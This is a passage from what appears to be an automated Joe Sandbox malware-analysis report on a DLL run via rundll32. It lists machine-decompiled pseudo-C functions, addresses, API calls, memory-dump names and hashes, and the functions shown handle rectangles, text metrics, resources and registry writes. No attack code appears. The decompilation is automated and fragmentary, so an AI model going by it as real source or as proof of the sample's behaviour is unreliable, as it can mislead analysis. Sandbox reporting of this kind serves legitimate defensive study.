					if((_t34 & 0x00000004) != 0) {
						L12:
						_t35 = 8;
						goto L13;
					}
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					E1002D766( &_v40);
					if((_v8 & 0x00000002 | 0x00000001) != 0) {
						InflateRect( &_v40, 1, 1);
					}
					_push(_a8);
					_t41 = PtInRect( &_v40, _a4);
					if(_t41 != 0) {
						goto L12;
					} else {
						_t35 = _t41 | 0xffffffff;
						goto L13;
					}
				}
				return _t30 | 0xffffffff;
			}













                                                                                                        0x1002dbf7
                                                                                                        0x1002dbfe
                                                                                                        0x1002dc07
                                                                                                        0x1002dc0c
                                                                                                        0x1002dc1c
                                                                                                        0x1002dc20
                                                                                                        0x1002dc2b
                                                                                                        0x1002dc2d
                                                                                                        0x1002dc39
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x1002dc42
                                                                                                        0x1002dc47
                                                                                                        0x1002dc55
                                                                                                        0x1002dca8
                                                                                                        0x1002dcaf
                                                                                                        0x00000000
                                                                                                        0x1002dcaf
                                                                                                        0x1002dc57
                                                                                                        0x1002dc57
                                                                                                        0x1002dc58
                                                                                                        0x1002dc5d
                                                                                                        0x1002dc62
                                                                                                        0x1002dc65
                                                                                                        0x1002dcac
                                                                                                        0x1002dcae
                                                                                                        0x00000000
                                                                                                        0x1002dcae
                                                                                                        0x1002dc6d
                                                                                                        0x1002dc6e
                                                                                                        0x1002dc6f
                                                                                                        0x1002dc73
                                                                                                        0x1002dc74
                                                                                                        0x1002dc83
                                                                                                        0x1002dc8d
                                                                                                        0x1002dc8d
                                                                                                        0x1002dc93
                                                                                                        0x1002dc9d
                                                                                                        0x1002dca1
                                                                                                        0x00000000
                                                                                                        0x1002dca3
                                                                                                        0x1002dca3
                                                                                                        0x00000000
                                                                                                        0x1002dca3
                                                                                                        0x1002dca1
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                          • Part of subcall function 1002DA71: InflateRect.USER32(1002E0A6,00000000,00000000), ref: 1002DAAC
                                                                                                        • PtInRect.USER32(?,?,?), ref: 1002DC1C
                                                                                                        • PtInRect.USER32(?,?,?), ref: 1002DC51
                                                                                                        • InflateRect.USER32(?,00000001,00000001), ref: 1002DC8D
                                                                                                        • PtInRect.USER32(?,?,?), ref: 1002DC9D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Rect$Inflate
                                                                                                        • String ID:
                                                                                                        • API String ID: 3687081316-0
                                                                                                        • Opcode ID: 573d57852034c20257ad405262cb508a5a3f7dea0af8832503ed6fcadfa9d461
                                                                                                        • Instruction ID: 35d4ff70deb68601e1a6f24137885eac82e657c5a127cb3b987647d9d18ffc71
                                                                                                        • Opcode Fuzzy Hash: 573d57852034c20257ad405262cb508a5a3f7dea0af8832503ed6fcadfa9d461
                                                                                                        • Instruction Fuzzy Hash: 3F216D32A0060AABDF10EFA4DD80ADE77EDEF44354B604426F915E7190E6B1EE05DB60
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 1001B3D4, Relevance: 6.1, APIs: 4, Instructions: 73windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 94%
                                                                                                        			E1001B3D4(intOrPtr* __ecx, void* __eflags, intOrPtr* _a4, intOrPtr _a12) {
				intOrPtr _v12;
				char _v16;
				struct tagRECT _v32;
				struct HDC__* _v44;
				char _v52;
				struct tagTEXTMETRICA _v108;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t26;
				int _t36;
				intOrPtr _t41;
				void* _t45;
				void* _t46;
				intOrPtr* _t47;
				intOrPtr* _t61;
				intOrPtr _t62;

				_t61 = __ecx;
				_push(0);
				E10009002(_t45,  &_v52, 0, __ecx, __eflags);
				_t26 = SendMessageA( *(_t61 + 0x20), 0x31, 0, 0);
				_t46 = 0;
				if(_t26 != 0) {
					_t46 = E1001B348( &_v52, _t26);
				}
				GetTextMetricsA(_v44,  &_v108);
				_t65 = _t46;
				if(_t46 != 0) {
					E1001B348( &_v52, _t46);
				}
				E10009056(_t46,  &_v52, 0, _t61, _t65);
				SetRectEmpty( &_v32);
				 *((intOrPtr*)( *_t61 + 0x140))( &_v32, _a12);
				 *((intOrPtr*)( *_t61 + 0x110))(0x407, 0,  &_v16);
				_t47 = _a4;
				 *_t47 = 0x7fff;
				_t36 = GetSystemMetrics(6);
				_t62 =  *((intOrPtr*)(_t61 + 0x94));
				_t41 = _t36 + _v12 + _t36 + _v12 - _v32.bottom - _v32.top - _v108.tmInternalLeading + _v108.tmHeight - 1;
				 *((intOrPtr*)(_t47 + 4)) = _t41;
				if(_t41 < _t62) {
					 *((intOrPtr*)(_t47 + 4)) = _t62;
				}
				return _t47;
			}





















                                                                                                        0x1001b3dd
                                                                                                        0x1001b3e1
                                                                                                        0x1001b3e5
                                                                                                        0x1001b3f1
                                                                                                        0x1001b3f7
                                                                                                        0x1001b3fb
                                                                                                        0x1001b406
                                                                                                        0x1001b406
                                                                                                        0x1001b40f
                                                                                                        0x1001b415
                                                                                                        0x1001b417
                                                                                                        0x1001b41d
                                                                                                        0x1001b41d
                                                                                                        0x1001b425
                                                                                                        0x1001b42e
                                                                                                        0x1001b43f
                                                                                                        0x1001b453
                                                                                                        0x1001b45c
                                                                                                        0x1001b464
                                                                                                        0x1001b46a
                                                                                                        0x1001b476
                                                                                                        0x1001b483
                                                                                                        0x1001b489
                                                                                                        0x1001b48c
                                                                                                        0x1001b48e
                                                                                                        0x1001b48e
                                                                                                        0x1001b497

                                                                                                        APIs
                                                                                                          • Part of subcall function 10009002: __EH_prolog3.LIBCMT ref: 10009009
                                                                                                          • Part of subcall function 10009002: GetDC.USER32(00000000), ref: 10009035
                                                                                                        • SendMessageA.USER32 ref: 1001B3F1
                                                                                                        • GetTextMetricsA.GDI32(?,?), ref: 1001B40F
                                                                                                        • SetRectEmpty.USER32(?), ref: 1001B42E
                                                                                                        • GetSystemMetrics.USER32 ref: 1001B46A
                                                                                                          • Part of subcall function 1001B348: SelectObject.GDI32(?,?), ref: 1001B357
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Metrics$EmptyH_prolog3MessageObjectRectSelectSendSystemText
                                                                                                        • String ID:
                                                                                                        • API String ID: 2929776503-0
                                                                                                        • Opcode ID: bc2ffc35ddb32c31155028ae070668d08351ffeaaa4aee59e5545593a40d1585
                                                                                                        • Instruction ID: 55925fb80c082c48170faea7f45b001d3cf4bafddf13ace22503d0a92c9a2fa2
                                                                                                        • Opcode Fuzzy Hash: bc2ffc35ddb32c31155028ae070668d08351ffeaaa4aee59e5545593a40d1585
                                                                                                        • Instruction Fuzzy Hash: 0021A476A00219AFDB11DFA4CC89DEEBBB9FF48700F004529F606AB155DB70A941CB60
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 10025E53, Relevance: 6.1, APIs: 4, Instructions: 61COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 95%
                                                                                                        			E10025E53(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				signed int _t31;
				intOrPtr _t33;
				intOrPtr _t42;
				intOrPtr _t44;
				intOrPtr _t45;
				intOrPtr* _t47;
				intOrPtr _t49;
				void* _t50;

				_push(4);
				E1003EE82(0x10055390, __ebx, __edi, __esi);
				_t49 = __ecx;
				 *((intOrPtr*)(_t50 - 0x10)) = __ecx;
				E10009A72(__ecx, 0,  *((intOrPtr*)(_t50 + 0x14)));
				_t47 = __ecx + 0x74;
				 *((intOrPtr*)(_t50 - 4)) = 0;
				 *((intOrPtr*)(__ecx)) = 0x1005cd04;
				E1003E9B0(_t47, _t47, 0, 0x3c);
				E1003E9B0(_t47, _t49 + 0xb0, 0, 0x3c);
				_t42 = _t49 + 0xec;
				E1003E9B0(_t47, _t42, 0, 0x40);
				_t45 =  *((intOrPtr*)(_t50 + 8));
				_t31 =  *(_t50 + 0xc) | 0x00000008;
				_t44 = 0x3c;
				 *((intOrPtr*)(_t49 + 0x54)) = 0x7006;
				 *_t47 = _t44;
				 *((intOrPtr*)(_t49 + 0xa0)) = _t42;
				 *(_t49 + 0x88) = _t31;
				 *((intOrPtr*)(_t49 + 0x94)) = E10034702;
				if(_t45 == 0) {
					 *((intOrPtr*)(_t49 + 0x80)) = _t49 + 0xb0;
				} else {
					 *(_t49 + 0x88) = _t31 | 0x00000040;
					 *((intOrPtr*)(_t49 + 0x80)) = _t45;
					E10007E59(_t47, _t49, _t50, _t49 + 0xb0, _t44, _t45, _t44);
				}
				_t33 =  *((intOrPtr*)(_t50 + 0x10));
				if(_t33 != 0) {
					 *(_t49 + 0x88) =  *(_t49 + 0x88) | 0x00000002;
					 *((intOrPtr*)(_t49 + 0x7c)) =  *((intOrPtr*)(_t33 + 4));
				}
				return E1003EF21(_t49);
			}











                                                                                                        0x10025e53
                                                                                                        0x10025e5a
                                                                                                        0x10025e5f
                                                                                                        0x10025e61
                                                                                                        0x10025e6a
                                                                                                        0x10025e71
                                                                                                        0x10025e76
                                                                                                        0x10025e79
                                                                                                        0x10025e7f
                                                                                                        0x10025e8e
                                                                                                        0x10025e95
                                                                                                        0x10025e9e
                                                                                                        0x10025ea6
                                                                                                        0x10025eae
                                                                                                        0x10025eb3
                                                                                                        0x10025eb4
                                                                                                        0x10025ebb
                                                                                                        0x10025ebd
                                                                                                        0x10025ec3
                                                                                                        0x10025ec9
                                                                                                        0x10025ed3
                                                                                                        0x10025efe
                                                                                                        0x10025ed5
                                                                                                        0x10025eda
                                                                                                        0x10025ee8
                                                                                                        0x10025eee
                                                                                                        0x10025ef3
                                                                                                        0x10025f04
                                                                                                        0x10025f09
                                                                                                        0x10025f0e
                                                                                                        0x10025f15
                                                                                                        0x10025f15
                                                                                                        0x10025f1f

                                                                                                        APIs
                                                                                                        • __EH_prolog3.LIBCMT ref: 10025E5A
                                                                                                          • Part of subcall function 10009A72: _memset.LIBCMT ref: 10009A89
                                                                                                        • _memset.LIBCMT ref: 10025E7F
                                                                                                        • _memset.LIBCMT ref: 10025E8E
                                                                                                        • _memset.LIBCMT ref: 10025E9E
                                                                                                          • Part of subcall function 10007E59: _memcpy_s.LIBCMT ref: 10007E69
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _memset$H_prolog3_memcpy_s
                                                                                                        • String ID:
                                                                                                        • API String ID: 3303856939-0
                                                                                                        • Opcode ID: 8eb90a3def40fd99c5449e4a94d02d05f746ec80889ee011427b2ce362731b9a
                                                                                                        • Instruction ID: afbe7d5343e1a47d43685e625b756e1b264decff9b7b3496c06de3c4284e2a29
                                                                                                        • Opcode Fuzzy Hash: 8eb90a3def40fd99c5449e4a94d02d05f746ec80889ee011427b2ce362731b9a
                                                                                                        • Instruction Fuzzy Hash: F7214DB5500745DEE351CF24C841B97B6E8FF08740F80891DF5AADB281DBB4B9048B55
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 1000ADD7, Relevance: 6.1, APIs: 4, Instructions: 58windowCOMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 87%
                                                                                                        			E1000ADD7(void* __ebx, void* __edi, void* __esi, void* __eflags, void* _a4, intOrPtr _a8, char _a12) {
				intOrPtr* _v0;
				void* _v4;
				signed int _v8;
				intOrPtr _v16;
				void* _t20;
				intOrPtr* _t23;
				void* _t29;
				void* _t31;
				intOrPtr _t35;
				char _t36;
				void* _t40;
				void* _t42;
				void* _t44;

				_t44 = __eflags;
				_t38 = __esi;
				_t37 = __edi;
				_t31 = __ebx;
				_push(4);
				E1003EE82(0x10053219, __ebx, __edi, __esi);
				_t35 = E1000775D(_t44, 0xc);
				_v16 = _t35;
				_t20 = 0;
				_v4 = 0;
				if(_t35 != 0) {
					_t20 = E1000ADA5(_t35);
				}
				_t36 = _a4;
				_v8 = _v8 | 0xffffffff;
				 *((intOrPtr*)(_t20 + 8)) = _t36;
				_a4 = _t20;
				E1003EF44( &_a4, 0x100677e8);
				asm("int3");
				_t40 = _t42;
				_t23 = _v0;
				_push(_t31);
				if(_t23 != 0) {
					 *_t23 = 0;
				}
				if(FormatMessageA(0x1100, 0,  *(_t36 + 8), 0x800,  &_a12, 0, 0) != 0) {
					E100083B8(0, _t37, _t38, _t40, _a4, _a8, _a12, 0xffffffff);
					LocalFree(_a12);
					_t29 = 1;
					__eflags = 1;
				} else {
					 *_a4 = 0;
					_t29 = 0;
				}
				return _t29;
			}
















                                                                                                        0x1000add7
                                                                                                        0x1000add7
                                                                                                        0x1000add7
                                                                                                        0x1000add7
                                                                                                        0x1000add7
                                                                                                        0x1000adde
                                                                                                        0x1000adeb
                                                                                                        0x1000aded
                                                                                                        0x1000adf0
                                                                                                        0x1000adf4
                                                                                                        0x1000adf7
                                                                                                        0x1000adf9
                                                                                                        0x1000adf9
                                                                                                        0x1000adfe
                                                                                                        0x1000ae01
                                                                                                        0x1000ae05
                                                                                                        0x1000ae08
                                                                                                        0x1000ae14
                                                                                                        0x1000ae19
                                                                                                        0x1000ae1b
                                                                                                        0x1000ae1d
                                                                                                        0x1000ae20
                                                                                                        0x1000ae25
                                                                                                        0x1000ae27
                                                                                                        0x1000ae27
                                                                                                        0x1000ae45
                                                                                                        0x1000ae5b
                                                                                                        0x1000ae66
                                                                                                        0x1000ae6e
                                                                                                        0x1000ae6e
                                                                                                        0x1000ae47
                                                                                                        0x1000ae4a
                                                                                                        0x1000ae4c
                                                                                                        0x1000ae4c
                                                                                                        0x1000ae71

                                                                                                        APIs
                                                                                                        • __EH_prolog3.LIBCMT ref: 1000ADDE
                                                                                                          • Part of subcall function 1000775D: _malloc.LIBCMT ref: 10007777
                                                                                                        • __CxxThrowException@8.LIBCMT ref: 1000AE14
                                                                                                        • FormatMessageA.KERNEL32(00001100,00000000,?,00000800,B5E27FEF,00000000,00000000,00000000,?,?,100677E8,00000004,100011A6,?,10001FDB,80070057), ref: 1000AE3D
                                                                                                          • Part of subcall function 100083B8: _wctomb_s.LIBCMT ref: 100083C8
                                                                                                        • LocalFree.KERNEL32(B5E27FEF,B5E27FEF), ref: 1000AE66
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Exception@8FormatFreeH_prolog3LocalMessageThrow_malloc_wctomb_s
                                                                                                        • String ID:
                                                                                                        • API String ID: 1615547351-0
                                                                                                        • Opcode ID: 2d1b435c7322724e9d553a996b3d2a1b74e4904f6292b957ce885ee692cb129d
                                                                                                        • Instruction ID: 5b4a9e45cfd546e6d573b237456e0d2ef36e7630c840a45fd8d59c220cb60ffd
                                                                                                        • Opcode Fuzzy Hash: 2d1b435c7322724e9d553a996b3d2a1b74e4904f6292b957ce885ee692cb129d
                                                                                                        • Instruction Fuzzy Hash: 521186B1604249AFEF01DFB4DC81D9E3BA9FB05790F104629F919DA191D731DE50CB50
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 10009E29, Relevance: 6.1, APIs: 4, Instructions: 57COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 90%
                                                                                                        			E10009E29(void* __ecx) {
				void* _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t23;
				void* _t28;
				void* _t30;
				struct HINSTANCE__* _t32;
				signed int _t34;
				signed short _t35;
				void* _t37;
				signed short* _t40;

				_push(__ecx);
				_push(_t28);
				_t37 = __ecx;
				_t42 =  *((intOrPtr*)(__ecx + 0x58));
				_t40 =  *(__ecx + 0x60);
				_v8 =  *((intOrPtr*)(__ecx + 0x5c));
				if( *((intOrPtr*)(__ecx + 0x58)) != 0) {
					_t32 =  *(E1000AB19(_t28, __ecx, _t40, _t42) + 0xc);
					_v8 = LoadResource(_t32, FindResourceA(_t32,  *(_t37 + 0x58), 5));
				}
				if(_v8 != 0) {
					_t40 = LockResource(_v8);
				}
				_t30 = 1;
				if(_t40 != 0) {
					_t35 =  *_t40;
					if(_t40[1] != 0xffff) {
						_t23 = _t40[5] & 0x0000ffff;
						_t34 = _t40[6] & 0x0000ffff;
					} else {
						_t35 = _t40[6];
						_t23 = _t40[9] & 0x0000ffff;
						_t34 = _t40[0xa] & 0x0000ffff;
					}
					if((_t35 & 0x00001801) != 0 || _t23 != 0 || _t34 != 0) {
						_t30 = 0;
					}
				}
				if( *(_t37 + 0x58) != 0) {
					FreeResource(_v8);
				}
				return _t30;
			}
















                                                                                                        0x10009e2c
                                                                                                        0x10009e2d
                                                                                                        0x10009e30
                                                                                                        0x10009e32
                                                                                                        0x10009e39
                                                                                                        0x10009e3c
                                                                                                        0x10009e3f
                                                                                                        0x10009e46
                                                                                                        0x10009e5d
                                                                                                        0x10009e5d
                                                                                                        0x10009e64
                                                                                                        0x10009e6f
                                                                                                        0x10009e6f
                                                                                                        0x10009e73
                                                                                                        0x10009e76
                                                                                                        0x10009e7e
                                                                                                        0x10009e80
                                                                                                        0x10009e8f
                                                                                                        0x10009e93
                                                                                                        0x10009e82
                                                                                                        0x10009e82
                                                                                                        0x10009e85
                                                                                                        0x10009e89
                                                                                                        0x10009e89
                                                                                                        0x10009e9c
                                                                                                        0x10009ea8
                                                                                                        0x10009ea8
                                                                                                        0x10009e9c
                                                                                                        0x10009eae
                                                                                                        0x10009eb3
                                                                                                        0x10009eb3
                                                                                                        0x10009ebf

                                                                                                        APIs
                                                                                                        • FindResourceA.KERNEL32(?,00000000,00000005), ref: 10009E4F
                                                                                                        • LoadResource.KERNEL32(?,00000000), ref: 10009E57
                                                                                                        • LockResource.KERNEL32(00000000), ref: 10009E69
                                                                                                        • FreeResource.KERNEL32(00000000), ref: 10009EB3
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Resource$FindFreeLoadLock
                                                                                                        • String ID:
                                                                                                        • API String ID: 1078018258-0
                                                                                                        • Opcode ID: 5fb930c99323afcddb2408e569f4f5418e03a578064818caed3c6f0fe0509fdd
                                                                                                        • Instruction ID: 41330bfbac2e30994af2f79ab8d9a084fe1f88da57a0411100a05bc76d769def
                                                                                                        • Opcode Fuzzy Hash: 5fb930c99323afcddb2408e569f4f5418e03a578064818caed3c6f0fe0509fdd
                                                                                                        • Instruction Fuzzy Hash: 85119E355007A5EBE750DFA5C888AABB7F9FF006D6F11842AE84253564D371AE40DBA0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 10038403, Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 86%
                                                                                                        			E10038403(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
				int _v8;
				int _t21;
				intOrPtr _t32;
				int _t36;
				void* _t46;

				_push(__ecx);
				_push(__ecx);
				_t46 = __ecx;
				_t36 = _a4 -  *((intOrPtr*)(__ecx + 4));
				_t21 = _a8 -  *((intOrPtr*)(__ecx + 8));
				_v8 = _t21;
				OffsetRect(__ecx + 0x28, _t36, _t21);
				OffsetRect(_t46 + 0x48, _t36, _v8);
				OffsetRect(_t46 + 0x38, _t36, _v8);
				OffsetRect(_t46 + 0x58, _t36, _v8);
				_t48 =  *((intOrPtr*)(_t46 + 0x80));
				 *((intOrPtr*)(_t46 + 4)) = _a4;
				 *((intOrPtr*)(_t46 + 8)) = _a8;
				if( *((intOrPtr*)(_t46 + 0x80)) == 0) {
					_t32 = E10037F56();
				} else {
					_t32 = 0;
				}
				 *((intOrPtr*)(_t46 + 0x74)) = _t32;
				return E100382A4(_t46, _t48, 0);
			}








                                                                                                        0x10038406
                                                                                                        0x10038407
                                                                                                        0x1003840d
                                                                                                        0x10038415
                                                                                                        0x10038421
                                                                                                        0x10038424
                                                                                                        0x1003842c
                                                                                                        0x10038436
                                                                                                        0x10038440
                                                                                                        0x1003844a
                                                                                                        0x1003844c
                                                                                                        0x10038456
                                                                                                        0x1003845c
                                                                                                        0x1003845f
                                                                                                        0x10038467
                                                                                                        0x10038461
                                                                                                        0x10038461
                                                                                                        0x10038461
                                                                                                        0x10038470
                                                                                                        0x1003847c

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: OffsetRect
                                                                                                        • String ID:
                                                                                                        • API String ID: 177026234-0
                                                                                                        • Opcode ID: 9004986a9e5b848e8884dc12bf4f03af3621e9a32ee2ab351af175bcae816a3c
                                                                                                        • Instruction ID: f516f793a2001ad18744dfb278574cf489e17ebe1a6fbf015eee1a85f101740b
                                                                                                        • Opcode Fuzzy Hash: 9004986a9e5b848e8884dc12bf4f03af3621e9a32ee2ab351af175bcae816a3c
                                                                                                        • Instruction Fuzzy Hash: 1B110C71600709AFDB11DFA9C984D9BB7ECEB48654F00482AF54AD7610E670FE449B60
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 1001BE02, Relevance: 6.1, APIs: 4, Instructions: 55registryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 94%
                                                                                                        			E1001BE02(void* __ecx, intOrPtr __edx, CHAR* _a4, char* _a8, char _a12) {
				signed int _v8;
				char _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t13;
				CHAR* _t21;
				char* _t24;
				intOrPtr _t28;
				void* _t30;
				signed int _t31;

				_t28 = __edx;
				_t13 =  *0x10072650; // 0xb5e27fef
				_v8 = _t13 ^ _t31;
				_t24 = _a8;
				_t30 = __ecx;
				_t29 = _a4;
				if( *((intOrPtr*)(__ecx + 0x54)) == 0) {
					E1003F3D3( &_v24, 0x10, 0x10062f20, _a12);
					_t18 = WritePrivateProfileStringA(_t29, _t24,  &_v24,  *(__ecx + 0x68));
				} else {
					_t30 = E1001BD53(__ecx, _t29);
					if(_t30 != 0) {
						_t21 = RegSetValueExA(_t30, _t24, 0, 4,  &_a12, 4);
						_t29 = _t21;
						RegCloseKey(_t30);
						_t18 = 0 | _t21 == 0x00000000;
					}
				}
				return E10039F21(_t18, _t24, _v8 ^ _t31, _t28, _t29, _t30);
			}














                                                                                                        0x1001be02
                                                                                                        0x1001be08
                                                                                                        0x1001be0f
                                                                                                        0x1001be13
                                                                                                        0x1001be17
                                                                                                        0x1001be1e
                                                                                                        0x1001be21
                                                                                                        0x1001be61
                                                                                                        0x1001be72
                                                                                                        0x1001be23
                                                                                                        0x1001be29
                                                                                                        0x1001be2d
                                                                                                        0x1001be3b
                                                                                                        0x1001be42
                                                                                                        0x1001be44
                                                                                                        0x1001be4e
                                                                                                        0x1001be4e
                                                                                                        0x1001be2d
                                                                                                        0x1001be86

                                                                                                        APIs
                                                                                                        • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000004,?,00000004), ref: 1001BE3B
                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 1001BE44
                                                                                                        • _swprintf.LIBCMT ref: 1001BE61
                                                                                                        • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 1001BE72
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp Download File
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp Download File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ClosePrivateProfileStringValueWrite_swprintf
                                                                                                        • String ID:
                                                                                                        • API String ID: 4210924919-0
                                                                                                        • Opcode ID: 8621adc8c6bf9ab1f721a16dd1c6c81c545cdfa4c7366de74b06408087212504
                                                                                                        • Instruction ID: 63a16b530c07007ae9887fddb737f9485d76bd101c9f4a5fdbc11a5c8fdd0245
                                                                                                        • Opcode Fuzzy Hash: 8621adc8c6bf9ab1f721a16dd1c6c81c545cdfa4c7366de74b06408087212504
                                                                                                        • Instruction Fuzzy Hash: E9018076501619ABDB11DF648C85FAF73BCEF48B54F000429FA01AB190DB74EA4587A4
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 1002E006, Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 87%
                                                                                                        			E1002E006(void* __ebx, intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8) {
